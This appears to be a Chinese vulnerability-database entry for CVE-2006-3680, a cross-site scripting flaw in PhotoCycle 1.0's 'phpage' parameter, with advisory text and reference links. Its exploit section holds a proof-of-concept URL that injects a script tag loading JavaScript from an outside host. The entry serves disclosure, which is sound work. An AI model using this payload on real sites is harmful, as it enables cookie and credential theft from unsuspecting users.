PhotoCycle 'PhotoCycle.php 'phpage参数跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110605 漏洞类型 跨站脚本
发布时间 2006-07-13 更新时间 2006-08-15
CVE编号 CVE-2006-3680 CNNVD-ID CNNVD-200607-293
漏洞平台 PHP CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/28214
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-293
|漏洞详情
Photocycle1.0的photocycle中存在跨站脚本攻击(XSS)漏洞,远程攻击者可以通过phpage参数注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/18964/info

Photocycle is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/photocycle.php?phpage=<script%20src=http://www.youfucktard.com/xss.js></script>
|参考资料

来源:BUGTRAQ
名称:20060714Re:Photocyclev1.0-XSS
链接:http://www.securityfocus.com/archive/1/archive/1/440078/100/100/threaded
来源:OSVDB
名称:27093
链接:http://www.osvdb.org/27093
来源:VUPEN
名称:ADV-2006-2805
链接:http://www.frsirt.com/english/advisories/2006/2805
来源:SECUNIA
名称:21054
链接:http://secunia.com/advisories/21054
来源:BUGTRAQ
名称:20060713Photocyclev1.0-XSS
链接:http://www.securityfocus.com/archive/1/archive/1/439968/100/0/threaded
来源:SECTRACK
名称:1016492
链接:http://securitytracker.com/id?1016492
来源:XF
名称:photocycle-unspecified-xss(27715)
链接:http://xforce.iss.net/xforce/xfdb/27715
来源:BID
名称:18964
链接:http://www.securityfocus.com/bid/18964